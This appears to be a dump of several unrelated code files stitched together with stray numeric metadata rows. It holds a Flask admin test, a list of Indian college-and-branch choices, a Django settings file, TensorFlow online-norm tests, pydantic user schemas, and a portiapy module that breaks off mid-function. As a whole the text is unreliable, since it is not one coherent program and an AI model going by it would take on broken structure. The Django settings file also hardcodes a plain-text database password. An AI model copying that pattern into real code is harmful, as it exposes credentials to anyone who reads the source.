self.assertTrue(edit_modal)
def test_admin_sponsor_check_can_view_details_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
def test_admin_sponsor_check_searchable_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que contém todos os campos de busca esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
expected_column_searchable_list = ('name',)
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de sponsor
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_searchable_list = self.get_context_variable('admin_view').column_searchable_list
self.assertEqual(len(expected_column_searchable_list), len(column_searchable_list))
for expected_searchable_field in expected_column_searchable_list:
self.assertIn(expected_searchable_field, column_searchable_list)
| 42.139025
| 173
| 0.557711
| 19,814
| 197,927
| 5.339255
| 0.029928
| 0.029946
| 0.016079
| 0.030891
| 0.926355
| 0.911392
| 0.896949
| 0.88553
| 0.871191
| 0.863317
| 0
| 0.006978
| 0.362836
| 197,927
| 4,696
| 174
| 42.147998
| 0.831895
| 0.202999
| 0
| 0.802902
| 0
| 0.000708
| 0.116864
| 0.019737
| 0
| 0
| 0
| 0.00362
| 0.197452
| 1
| 0.03857
| false
| 0.08351
| 0.003892
| 0
| 0.044586
| 0.001062
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
999071ff969a1cc7004a3a8eac2e11f2eaad2108
| 5,621
|
py
|
Python
|
user_details/all_choices.py
|
Shreyanshsachan/College-Predictor
|
87068aa1d1a889ced586ff155bc2b5d9a78340f7
|
[
"MIT"
] | null | null | null |
user_details/all_choices.py
|
Shreyanshsachan/College-Predictor
|
87068aa1d1a889ced586ff155bc2b5d9a78340f7
|
[
"MIT"
] | null | null | null |
user_details/all_choices.py
|
Shreyanshsachan/College-Predictor
|
87068aa1d1a889ced586ff155bc2b5d9a78340f7
|
[
"MIT"
] | null | null | null |
COLLEGE_SELECTED = (
('Indian Institute of Technology Bombay, Aerospace Engineering' ,
'Indian Institute of Technology Bombay, Aerospace Engineering') ,
('Indian Institute of Technology Bombay, Chemical Engineering' ,
'Indian Institute of Technology Bombay, Chemical Engineering') ,
('Indian Institute of Technology Bombay, Civil Engineering' ,
'Indian Institute of Technology Bombay, Civil Engineering') ,
('Indian Institute of Technology Bombay, Computer Science and Engineering' ,
'Indian Institute of Technology Bombay, Computer Science and Engineering') ,
('Indian Institute of Technology Bombay, Electrical Engineering' ,
'Indian Institute of Technology Bombay, Electrical Engineering') ,
('Indian Institute of Technology Bombay, Electronics and Communication' ,
'Indian Institute of Technology Bombay, Electronics and Communication') ,
('Indian Institute of Technology Bombay, Mechanical Engineering' ,
'Indian Institute of Technology Bombay, Mechanical Engineering') ,
('Indian Institute of Technology Delhi, Aerospace Engineering' ,
'Indian Institute of Technology Delhi, Aerospace Engineering') ,
('Indian Institute of Technology Delhi, Chemical Engineering' ,
'Indian Institute of Technology Delhi, Chemical Engineering') ,
('Indian Institute of Technology Delhi, Civil Engineering' ,
'Indian Institute of Technology Delhi, Civil Engineering') ,
('Indian Institute of Technology Delhi, Computer Science and Engineering' ,
'Indian Institute of Technology Delhi, Computer Science and Engineering') ,
('Indian Institute of Technology Delhi, Electrical Engineering' ,
'Indian Institute of Technology Delhi, Electrical Engineering') ,
('Indian Institute of Technology Delhi, Electronics and Communication' ,
'Indian Institute of Technology Delhi, Electronics and Communication') ,
('Indian Institute of Technology Delhi, Mechanical Engineering' ,
'Indian Institute of Technology Delhi, Mechanical Engineering') ,
('National Institute of Technology Surathkal, Chemical Engineering' ,
'National Institute of Technology Surathkal, Chemical Engineering') ,
('National Institute of Technology Surathkal, Civil Engineering' ,
'National Institute of Technology Surathkal, Civil Engineering') ,
('National Institute of Technology Surathkal, Computer Science and Engineering' ,
'National Institute of Technology Surathkal, Computer Science and Engineering') ,
('National Institute of Technology Surathkal, Electrical Engineering' ,
'National Institute of Technology Surathkal, Electrical Engineering') ,
('National Institute of Technology Surathkal, Electronics and Communication' ,
'National Institute of Technology Surathkal, Electronics and Communication') ,
('National Institute of Technology Surathkal, Information Technology' ,
'National Institute of Technology Surathkal, Information Technology') ,
('National Institute of Technology Surathkal, Mechanical Engineering' ,
'National Institute of Technology Surathkal, Mechanical Engineering') ,
('National Institute of Technology Trichy, Chemical Engineering' ,
'National Institute of Technology Trichy, Chemical Engineering') ,
('National Institute of Technology Trichy, Civil Engineering' ,
'National Institute of Technology Trichy, Civil Engineering') ,
('National Institute of Technology Trichy, Computer Science and Engineering' ,
'National Institute of Technology Trichy, Computer Science and Engineering') ,
('National Institute of Technology Trichy, Electrical Engineering' ,
'National Institute of Technology Trichy, Electrical Engineering') ,
('National Institute of Technology Trichy, Electronics and Communication' ,
'National Institute of Technology Trichy, Electronics and Communication') ,
('National Institute of Technology Trichy, Information Technology' ,
'National Institute of Technology Trichy, Information Technology') ,
('National Institute of Technology Trichy, Mechanical Engineering' ,
'National Institute of Technology Trichy, Mechanical Engineering') ,
('Indian Institute of Information Technology Allahabad, Computer Science and Engineering' ,
'Indian Institute of Information Technology Allahabad, Computer Science and Engineering') ,
('Indian Institute of Information Technology Allahabad, Electrical Engineering' ,
'Indian Institute of Information Technology Allahabad, Electrical Engineering') ,
('Indian Institute of Information Technology Allahabad, Electronics and Communication' ,
'Indian Institute of Information Technology Allahabad, Electronics and Communication') ,
('Indian Institute of Information Technology Allahabad, Information Technology' ,
'Indian Institute of Information Technology Allahabad, Information Technology') ,
('Indian Institute of Information Technology Delhi, Computer Science and Engineering' ,
'Indian Institute of Information Technology Delhi, Computer Science and Engineering') ,
('Indian Institute of Information Technology Delhi, Electrical Engineering' ,
'Indian Institute of Information Technology Delhi, Electrical Engineering') ,
('Indian Institute of Information Technology Delhi, Electronics and Communication' ,
'Indian Institute of Information Technology Delhi, Electronics and Communication') ,
('Indian Institute of Information Technology Delhi, Information Technology' ,
'Indian Institute of Information Technology Delhi, Information Technology') ,
)
| 73.960526
| 96
| 0.762854
| 558
| 5,621
| 7.682796
| 0.043011
| 0.184745
| 0.274318
| 0.209004
| 0.996501
| 0.996501
| 0.996501
| 0.96641
| 0.946583
| 0.946583
| 0
| 0
| 0.172567
| 5,621
| 76
| 97
| 73.960526
| 0.921737
| 0
| 0
| 0
| 0
| 0
| 0.858769
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
999a85652676dab16f19349b17f548ffc3f14849
| 2,308
|
py
|
Python
|
src/csgschool/local_settings.py
|
kaizer88/csg
|
e3de84438c5b7c0e4848300c02f06d81cbfa077f
|
[
"MIT"
] | null | null | null |
src/csgschool/local_settings.py
|
kaizer88/csg
|
e3de84438c5b7c0e4848300c02f06d81cbfa077f
|
[
"MIT"
] | null | null | null |
src/csgschool/local_settings.py
|
kaizer88/csg
|
e3de84438c5b7c0e4848300c02f06d81cbfa077f
|
[
"MIT"
] | null | null | null |
import os
from .settings import *
DATABASES = {
'default': {
# 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'csg', # Or path to database file if using sqlite3.
'USER': 'postgres', # Not used with sqlite3.
# 'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'Lihle@2016', # Not used with sqlite3.
# 'PASSWORD': '', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
# 'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
},
# 'splicedb': {
# # 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
# 'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
# 'NAME': 'myhome', # Or path to database file if using sqlite3.
# 'USER': 'postgres', # Not used with sqlite3.
# # 'USER': 'root', # Not used with sqlite3.
# 'PASSWORD': 'Lihle@2016', # Not used with sqlite3.
# # 'PASSWORD': '', # Not used with sqlite3.
# 'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
# # 'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
# 'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
# }
}
ALLOWED_HOSTS = []
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_PORT = 587
EMAIL_USE_TLS = True
TIME_ZONE = 'Africa/Johannesburg'
try:
from .local_settings import *
except ImportError:
pass
| 48.083333
| 140
| 0.520364
| 231
| 2,308
| 5.125541
| 0.264069
| 0.08277
| 0.130068
| 0.212838
| 0.822635
| 0.822635
| 0.822635
| 0.822635
| 0.822635
| 0.822635
| 0
| 0.035547
| 0.353986
| 2,308
| 48
| 141
| 48.083333
| 0.758551
| 0.67721
| 0
| 0
| 0
| 0
| 0.18156
| 0.053901
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.130435
| 0.173913
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5136c13673f01659337be43f2aeaddccbd5ffe29
| 16,374
|
py
|
Python
|
online-norm/tensorflow/tests/test_online_norm.py
|
ClashLuke/online-normalization
|
fe08b9f8e288d628eee4f9991e562cdb4f9e997b
|
[
"BSD-3-Clause"
] | 55
|
2019-09-04T06:24:39.000Z
|
2022-02-27T21:07:36.000Z
|
online-norm/tensorflow/tests/test_online_norm.py
|
ClashLuke/online-normalization
|
fe08b9f8e288d628eee4f9991e562cdb4f9e997b
|
[
"BSD-3-Clause"
] | 7
|
2019-12-28T05:17:19.000Z
|
2021-10-19T20:45:56.000Z
|
online-norm/tensorflow/tests/test_online_norm.py
|
ClashLuke/online-normalization
|
fe08b9f8e288d628eee4f9991e562cdb4f9e997b
|
[
"BSD-3-Clause"
] | 16
|
2019-09-08T09:54:42.000Z
|
2022-03-22T22:32:59.000Z
|
"""
Released under BSD 3-Clause License,
Copyright (c) 2019 Cerebras Systems Inc.
All rights reserved.
Testing for Online Normalization Layer using numpy reference
"""
import os
import sys
import unittest
import numpy as np
import tensorflow as tf
from online_norm_tf import online_norm
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../..")
from numpy_on import OnlineNorm1d as NpOnlineNorm1d
from numpy_on import OnlineNorm2d as NpOnlineNorm2d
from tensorflow.keras.mixed_precision.experimental import Policy
tf.logging.set_verbosity(tf.logging.ERROR)
class TestOnlineNorm(unittest.TestCase):
def template_numerical_comparison_on_vs_np(
self,
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
dtype=None,
):
in_shape = np_inputs.shape
batch_size = in_shape[0]
NpOnlineNorm = NpOnlineNorm2d if len(in_shape) == 4 else NpOnlineNorm1d
# Instantiate numpy layer
np_norm = NpOnlineNorm(
in_shape[1],
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
affine=False,
ecm='',
)
# Instantiate the tf implementation of online norm layer
# without batch acceleration
in_shape = in_shape
if dtype==None:
tf_inputs = tf.placeholder(tf.float32, shape=in_shape)
else:
tf_inputs = tf.placeholder(tf.float16, shape=in_shape)
tf_norm = online_norm(
tf_inputs,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
axis=axis,
training=True,
center=False,
scale=False,
ecm='',
dtype=dtype,
)
if np_grad_out is not None:
# set up tf_norm's gradient functionality
if dtype==None:
tf_grad_ys = tf.placeholder(tf.float32, shape=in_shape)
else:
tf_grad_ys = tf.placeholder(tf.float16, shape=in_shape)
tf_norm_grad = tf.gradients(
ys=tf_norm,
xs=tf_inputs,
grad_ys=tf_grad_ys
)
rtol = 1e-4 if dtype==None else 1e-2
atol = 1e-5 if dtype==None else 1e-3
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# Iterate over generated data
for itr in range(itrs):
# fprop through numpy Online Norm class
np_out = np_norm(np_inputs)
if np_grad_out is not None:
# bprop through numpy Online Norm class
np_grad_in = np_norm.backward(np_grad_out)
if np_grad_out is None:
# get the output of the tf layer
on_tf_out = sess.run(
[tf_norm],
feed_dict={tf_inputs: np_inputs}
)
out = np.array(on_tf_out[0])
for n in range(batch_size):
# numerically compare output
err_msg=f'output comparison failed on itr: {itr}, n: {n}'
np.testing.assert_allclose(
out[n],
np_out[n],
rtol=rtol, atol=atol, err_msg=err_msg
)
if np_grad_out is not None:
# get the deltas of the tf layer
grad_dict = {tf_grad_ys: np_grad_out,
tf_inputs: np_inputs}
tf_grad_xs = np.array(
sess.run(
[tf_norm_grad],
feed_dict=grad_dict
)[0][0]
)
for n in range(batch_size):
# numerically compare deltas
err_msg=f'grad comparison failed on itr: {itr}, n: {n}'
np.testing.assert_allclose(
tf_grad_xs[n],
np_grad_in[n],
rtol=rtol, atol=atol, err_msg=err_msg
)
def test0211_1d_numerical_comparison_on_fprop_vs_np_batchsize1(
self,
batch_size=1,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer's fprop against numpy implementation for 1d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test0221_2d_numerical_comparison_on_fprop_vs_np_batchsize1(
self,
batch_size=1,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer's fprop against numpy implementation for 2d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test021_1d_numerical_comparison_on_fprop_vs_np(
self,
batch_size=8,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer's fprop against numpy implementation for 1d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test022_2d_numerical_comparison_on_fprop_vs_np(
self,
batch_size=8,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer's fprop against numpy implementation for 2d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test0311_1d_numerical_comparison_on_vs_np_batchsize1(
self,
batch_size=1,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer against numpy implementation for 1d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features) + .125
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test0321_2d_numerical_comparison_on_vs_np_batchsize1(
self,
batch_size=1,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer against numpy implementation for 2d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test031_1d_numerical_comparison_on_vs_np(
self,
batch_size=8,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer against numpy implementation for 1d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features) + .125
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test032_2d_numerical_comparison_on_vs_np(
self,
batch_size=8,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer against numpy implementation for 2d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test0411_1d_numerical_comparison_on_fprop_vs_np_batchsize1_mp(
self,
batch_size=1,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer's fprop against numpy implementation for 1d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test0421_2d_numerical_comparison_on_fprop_vs_np_batchsize1_mp(
self,
batch_size=1,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer's fprop against numpy implementation for 2d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test041_1d_numerical_comparison_on_fprop_vs_np_mp(
self,
batch_size=8,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer's fprop against numpy implementation for 1d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test042_2d_numerical_comparison_on_fprop_vs_np_mp(
self,
batch_size=8,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer's fprop against numpy implementation for 2d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test0511_1d_numerical_comparison_on_vs_np_batchsize1_mp(
self,
batch_size=1,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer against numpy implementation for 1d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features) + .125
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test0521_2d_numerical_comparison_on_vs_np_batchsize1_mp(
self,
batch_size=1,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer against numpy implementation for 2d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test051_1d_numerical_comparison_on_vs_np_mp(
self,
batch_size=8,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer against numpy implementation for 1d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features) + .125
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test052_2d_numerical_comparison_on_vs_np_mp(
self,
batch_size=8,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer against numpy implementation for 2d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
if __name__ == '__main__':
unittest.main()
| 29.239286
| 88
| 0.557225
| 1,995
| 16,374
| 4.26416
| 0.093734
| 0.049841
| 0.04126
| 0.067591
| 0.824615
| 0.817444
| 0.803691
| 0.794757
| 0.790055
| 0.751381
| 0
| 0.04321
| 0.365396
| 16,374
| 559
| 89
| 29.291592
| 0.775479
| 0.13039
| 0
| 0.750611
| 0
| 0
| 0.021983
| 0
| 0
| 0
| 0
| 0
| 0.00489
| 1
| 0.041565
| false
| 0
| 0.022005
| 0
| 0.066015
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
516687170da3c84b7297c2bfb50a324d916ef292
| 2,450
|
py
|
Python
|
users/schema.py
|
Mohamed-Kaizen/home_recruiters
|
5b2761ebcdb45bf2f99dd9f29c12a35c513677ad
|
[
"MIT"
] | 1
|
2021-03-09T13:16:05.000Z
|
2021-03-09T13:16:05.000Z
|
users/schema.py
|
Mohamed-Kaizen/home_recruiters
|
5b2761ebcdb45bf2f99dd9f29c12a35c513677ad
|
[
"MIT"
] | null | null | null |
users/schema.py
|
Mohamed-Kaizen/home_recruiters
|
5b2761ebcdb45bf2f99dd9f29c12a35c513677ad
|
[
"MIT"
] | 3
|
2020-05-02T20:49:03.000Z
|
2021-03-08T16:46:07.000Z
|
from typing import List
from core.settings import settings
from pydantic import BaseModel, EmailStr, Field, validator
from . import validators
from .models import Career
class TokenData(BaseModel):
username: str
exp: int
user_uuid: str
class WorkerCreate(BaseModel):
username: str = Field(..., min_length=1, max_length=250)
password: str = Field(
...,
min_length=settings.MINIMUM_PASSWORD_LENGTH,
max_length=settings.MAXIMUM_PASSWORD_LENGTH,
)
email: EmailStr
full_name: str = Field(..., max_length=400)
phone_number: str = Field(..., min_length=9, max_length=10)
career: Career
@validator("username")
def extra_validation_on_username(cls, value: str):
validators.validate_reserved_name(value=value, exception_class=ValueError)
validators.validate_confusables(value=value, exception_class=ValueError)
return value
@validator("email")
def extra_validation_on_email(cls, value: str):
local_part, domain = value.split("@")
validators.validate_reserved_name(value=local_part, exception_class=ValueError)
validators.validate_confusables_email(
domain=domain, local_part=local_part, exception_class=ValueError
)
return value
class UserList(BaseModel):
username: List[str]
class WorkerList(BaseModel):
username: List[str]
career: Career
class CustomerCreate(BaseModel):
username: str = Field(..., min_length=1, max_length=250)
password: str = Field(
...,
min_length=settings.MINIMUM_PASSWORD_LENGTH,
max_length=settings.MAXIMUM_PASSWORD_LENGTH,
)
email: EmailStr
full_name: str = Field(..., max_length=400)
phone_number: str = Field(..., min_length=9, max_length=10)
@validator("username")
def extra_validation_on_username(cls, value: str):
validators.validate_reserved_name(value=value, exception_class=ValueError)
validators.validate_confusables(value=value, exception_class=ValueError)
return value
@validator("email")
def extra_validation_on_email(cls, value: str):
local_part, domain = value.split("@")
validators.validate_reserved_name(value=local_part, exception_class=ValueError)
validators.validate_confusables_email(
domain=domain, local_part=local_part, exception_class=ValueError
)
return value
| 23.557692
| 87
| 0.697551
| 279
| 2,450
| 5.878136
| 0.207885
| 0.039024
| 0.117073
| 0.062195
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0
| 0.010304
| 0.207755
| 2,450
| 103
| 88
| 23.786408
| 0.834621
| 0
| 0
| 0.721311
| 0
| 0
| 0.011429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0.098361
| 0.081967
| 0
| 0.57377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
5a8de511ba08a3849e1ce3ce45f57d989c95a12c
| 8,406
|
py
|
Python
|
portiapy/describe.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | 1
|
2019-05-22T18:38:01.000Z
|
2019-05-22T18:38:01.000Z
|
portiapy/describe.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | 4
|
2018-09-17T13:16:18.000Z
|
2021-02-26T13:30:49.000Z
|
portiapy/describe.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | null | null | null |
"""Description tools to discover a device's list of ports, sensors and
dimensions.
"""
import json
import pandas as pd
import portiapy.utils as utils
def device_ports(
portia_config: dict,
edge_id: str,
last: bool=False,
params: dict={
'from': None,
'to': None,
'sort': True,
'precision': 'ms',
'timezone': 'Etc/UTC'
}) -> object:
"""Lists a device's ports.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
Keyword Arguments:
last {bool} -- if the last package of each port should be returned or
not (default: {False})
params {dict} -- params to send to the service (default:
{{ 'from', 'to', 'sort', 'precision': 'ms',
'timezone': 'Etc/UTC' }})
Returns:
object -- object with the list of ports
Raises:
Exception -- when the request goes wrong
"""
if last == False:
endpoint = '/describe/device/{0}/ports'.format(edge_id)
else:
endpoint = '/describe/device/{0}/ports/last'.format(edge_id)
response = utils.http_get_request(portia_config, endpoint, params)
if response.status_code == 200:
d = json.loads(response.text).get('ports')
